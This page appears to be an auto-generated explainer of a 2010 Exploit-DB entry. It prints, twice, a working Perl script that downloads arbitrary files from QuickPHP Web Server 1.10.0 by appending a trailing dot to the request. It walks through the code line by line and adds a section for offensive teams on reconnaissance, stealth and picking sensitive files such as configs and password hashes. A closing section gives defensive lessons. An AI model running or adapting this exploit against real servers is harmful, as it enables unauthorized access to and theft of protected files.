By exploitdb papers bot•December 30, 2010•

papers

QuickPHP Web Server 1.10.0 Remote File Download Exploit Explained

What this paper is

This paper details a vulnerability in QuickPHP Web Server version 1.10.0 that allows an attacker to download arbitrary files from the server, even if they do not have the necessary permissions. The exploit is presented as a Perl script that leverages this vulnerability to retrieve specified files.

Simple technical breakdown

The core of the vulnerability lies in how QuickPHP Web Server handles file requests. It appears to have a weakness in its request parsing or file access control mechanism. When a request is made for a file, the server doesn't properly validate the requested path or the user's permissions before serving the file. The exploit script capitalizes on this by constructing a URL that tricks the server into returning the content of any file specified by the attacker.

The exploit works by sending a GET request to the vulnerable server. The URL is crafted to include the target file name followed by a dot (.). This specific construction seems to trigger the vulnerability, causing the server to return the file's content instead of an error or a directory listing.

Complete code and payload walkthrough

The provided Perl script is designed to exploit the arbitrary file download vulnerability in QuickPHP Web Server 1.10.0.

#!/usr/bin/perl
use LWP::Simple;

if (@ARGV < 3) {
	print("\r\n");
	print("QuickPHP Web Server 1.10.0 Remote File Download Exploit\r\n");
	print("Discovered & Exploited by Pr0T3cT10n\r\n");
	print("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n");
	print("Usage: " .$0. " <host> <port> <file>\r\n");
	print("HOST - An host using QuickPHP Web Server\r\n");
	print("PORT - Port number\r\n");
	print("FILE - The file you want to get\r\n");
	print("Example: " .$0. " hostingserver.com 80 index.php\r\n\r\n");
	exit(1);
} else {
	print("QuickPHP Web Server 1.10.0 Remote File Download Exploit\r\n");
	print("Discovered & Exploited by Pr0T3cT10n\r\n");
	print("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\n");
	($host, $port, $file) = @ARGV;
	$content = get("http://" .$host. ":" .$port. "/" .$file. ".");
        print("File Content:\r\n\r\n");
	print($content. "\r\n");
}

Let's break down the code:

#!/usr/bin/perl: This is the shebang line, indicating that the script should be executed using the Perl interpreter.
use LWP::Simple;: This line imports the LWP::Simple module, which provides a simple interface for making HTTP requests. This module is crucial for fetching content from the web server.
if (@ARGV < 3): This checks if the number of command-line arguments (@ARGV) is less than 3.
- @ARGV: This is a special Perl array that holds the command-line arguments passed to the script.
- If the condition is true (fewer than 3 arguments), it means the user hasn't provided all the necessary information (host, port, file).
- print(...): These lines print usage instructions and information about the exploit.
- exit(1);: This terminates the script with an error code of 1, indicating that an error occurred (due to incorrect usage).
else { ... }: This block executes if there are 3 or more command-line arguments, meaning the user has provided the required information.
- print(...): These lines print introductory messages about the exploit.
- ($host, $port, $file) = @ARGV;: This line assigns the first three command-line arguments to the variables $host, $port, and $file respectively.
  - $host: Will contain the target server's hostname or IP address.
  - $port: Will contain the target server's port number.
  - $file: Will contain the name of the file the attacker wants to download.
- $content = get("http://" .$host. ":" .$port. "/" .$file. ".");: This is the core of the exploit.
  - get(...): This function from LWP::Simple performs an HTTP GET request to the specified URL and returns the content of the response.
  - "http://" .$host. ":" .$port. "/" .$file. ".": This constructs the URL. It concatenates "http://", the target host, the port, a forward slash, the target file name, and crucially, a trailing dot (.). This trailing dot is what triggers the vulnerability in QuickPHP Web Server.
  - The retrieved content from the server is stored in the $content variable.
- print("File Content:\r\n\r\n");: Prints a header indicating that the file content will follow.
- print($content. "\r\n");: Prints the actual content of the downloaded file, followed by a newline.

Payload/Shellcode Explanation:

There is no explicit shellcode or complex payload in this script. The "payload" is simply the crafted HTTP GET request that exploits the server's vulnerability to download a file. The script itself acts as the delivery mechanism for this request. The output of the script is the content of the downloaded file.

Code Fragment/Block -> Practical Purpose Mapping:

#!/usr/bin/perl: Script interpreter declaration.
use LWP::Simple;: Imports HTTP request library.
if (@ARGV < 3): Checks for sufficient command-line arguments.
print("Usage: ..."): Displays help message if arguments are insufficient.
exit(1);: Exits script on incorrect usage.
($host, $port, $file) = @ARGV;: Assigns command-line arguments to variables.
get("http://" .$host. ":" .$port. "/" .$file. ".");: Constructs and sends the exploit URL to download the file.
print($content. "\r\n");: Displays the downloaded file content.

Practical details for offensive operations teams

Required Access Level: Network access to the target host and port where QuickPHP Web Server is running. No prior authentication is required as this is an unauthenticated remote vulnerability.
Lab Preconditions:
- A target system running QuickPHP Web Server version 1.10.0.
- Network connectivity between the attacker's machine and the target.
- The target server must be accessible over the network.
Tooling Assumptions:
- A system with Perl installed.
- The LWP::Simple Perl module must be installed (usually included with standard Perl distributions, but worth verifying).
- Basic network tools like ping or nmap might be useful for initial reconnaissance to confirm host availability and port status.
Execution Pitfalls:
- Incorrect Version: The exploit is specific to version 1.10.0. If the target is running a different version, it will likely fail.
- Firewall/Network Restrictions: Network firewalls or Intrusion Prevention Systems (IPS) might block the HTTP request or detect the unusual URL pattern.
- Server Configuration: While the vulnerability is in the server software, specific server configurations (e.g., extreme access restrictions on the web server process itself) might prevent the download of certain sensitive files, even if the exploit technically works.
- File Not Found: If the specified file does not exist on the server, the get() function will likely return an HTTP error (e.g., 404 Not Found), and the script will print that error message as the "File Content."
- Large Files: Downloading very large files might consume significant bandwidth and time, and the script's output might become unwieldy.
- Encoding Issues: If the file path or content contains special characters that are not handled correctly by Perl or the web server, it could lead to unexpected results.
Tradecraft Considerations:
- Reconnaissance: Before executing, confirm the target is running a web server and identify the specific version if possible. Tools like nmap with version detection scripts can be helpful.
- Stealth: The exploit itself is a simple HTTP GET request. The primary indicators would be network traffic to the target's web server port. The LWP::Simple module might not be as noisy as some other HTTP clients, but network monitoring can still detect the outbound request.
- File Selection: Carefully choose the files to download. Attempting to download known sensitive files (e.g., configuration files, password hashes, system executables) is a common objective.
- Post-Exploitation: The downloaded file content is printed to standard output. For automated collection, the output can be redirected to a file (perl exploit.pl target.com 80 config.ini > downloaded_config.ini).

Where this was used and when

Context: This exploit targets a vulnerability in a web server software. Such vulnerabilities are typically exploited by attackers to gain unauthorized access to sensitive information hosted on web servers. This could be for data theft, reconnaissance, or as a stepping stone for further attacks.
Approximate Years/Dates: The paper was published on December 30, 2010. Therefore, this exploit was likely developed and potentially used around that time. Vulnerabilities of this nature can remain unpatched for some time after discovery, so it's possible it was relevant for a period after its publication.

Defensive lessons for modern teams

Software Patching and Updates: The most critical lesson is the importance of keeping web server software and all its components up-to-date. This vulnerability was specific to version 1.10.0, highlighting the need to patch to later, more secure versions.
Input Validation: Web applications and servers must rigorously validate all user inputs, especially file paths and request parameters. The vulnerability here suggests a lack of proper sanitization or validation of the requested file path.
Principle of Least Privilege: Web server processes should run with the minimum necessary privileges. Even if a vulnerability allows an attacker to request a file, the server process should not have permissions to read highly sensitive system files.
Web Application Firewalls (WAFs): WAFs can be configured to detect and block requests with suspicious patterns, such as unusual file extensions or path traversals, which might include the trailing dot used in this exploit.
File Access Control: Implement strict access controls on the file system to prevent unauthorized users or processes from reading sensitive files.
Monitoring and Logging: Monitor web server logs for unusual access patterns, such as repeated requests for non-existent files or attempts to access sensitive directories.

ASCII visual (if applicable)

This exploit is a direct client-server interaction for file retrieval. An ASCII visual can represent the flow of the request and response.

+-----------------+       HTTP GET Request       +---------------------+
| Attacker's Host | ----------------------------> | QuickPHP Web Server |
| (Perl Script)   | (e.g., GET /sensitive.conf.) | (v1.10.0)           |
+-----------------+                               +----------+----------+
                                                             |
                                                             | HTTP Response (File Content)
                                                             v
                                                     +-----------------+
                                                     | Attacker's Host |
                                                     | (Perl Script)   |
                                                     +-----------------+

Source references

PAPER ID: 15868
PAPER TITLE: QuickPHP Web Server - Arbitrary '.php' File Download
AUTHOR: Yakir Wizman
PUBLISHED: 2010-12-30
KEYWORDS: Windows, remote
PAPER URL: https://www.exploit-db.com/papers/15868
RAW URL: https://www.exploit-db.com/raw/15868
Software Link (from paper): http://www.zachsaw.co.cc/downloads/quickphp_webserver.zip

Original Exploit-DB Content (Verbatim)

#     _             ____  __            __    ___ 
#    (_)____ _   __/ __ \/ /_____  ____/ /  _/_/ |
#   / // __ \ | / / / / / //_/ _ \/ __  /  / / / /
#  / // / / / |/ / /_/ / ,< /  __/ /_/ /  / / / / 
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/  / /_/_/  
#                   Live by the byte     |_/_/  
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
# QuickPHP Web Server is vulnerable for a Remote File Download attcak, the following code will exploit the bug.
# The vulnerability allows an unprivileged attacker to download files whom he has no permissions to.
# -----------------------------------
# Vulnerability Title: QuickPHP Web Server 1.10.0 Remote File Download Exploit
# Date: 30/12/2010
# Author: Pr0T3cT10n
# Software Link: http://www.zachsaw.co.cc/downloads/quickphp_webserver.zip
# Affected Version: 1.10.0
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
###

#!/usr/bin/perl
use LWP::Simple;

if (@ARGV < 3) {
	print("\r\n");
	print("QuickPHP Web Server 1.10.0 Remote File Download Exploit\r\n");
	print("Discovered & Exploited by Pr0T3cT10n\r\n");
	print("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n");
	print("Usage: " .$0. " <host> <port> <file>\r\n");
	print("HOST - An host using QuickPHP Web Server\r\n");
	print("PORT - Port number\r\n");
	print("FILE - The file you want to get\r\n");
	print("Example: " .$0. " hostingserver.com 80 index.php\r\n\r\n");
	exit(1);
} else {
	print("QuickPHP Web Server 1.10.0 Remote File Download Exploit\r\n");
	print("Discovered & Exploited by Pr0T3cT10n\r\n");
	print("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\n");
	($host, $port, $file) = @ARGV;
	$content = get("http://" .$host. ":" .$port. "/" .$file. ".");
        print("File Content:\r\n\r\n");
	print($content. "\r\n");
}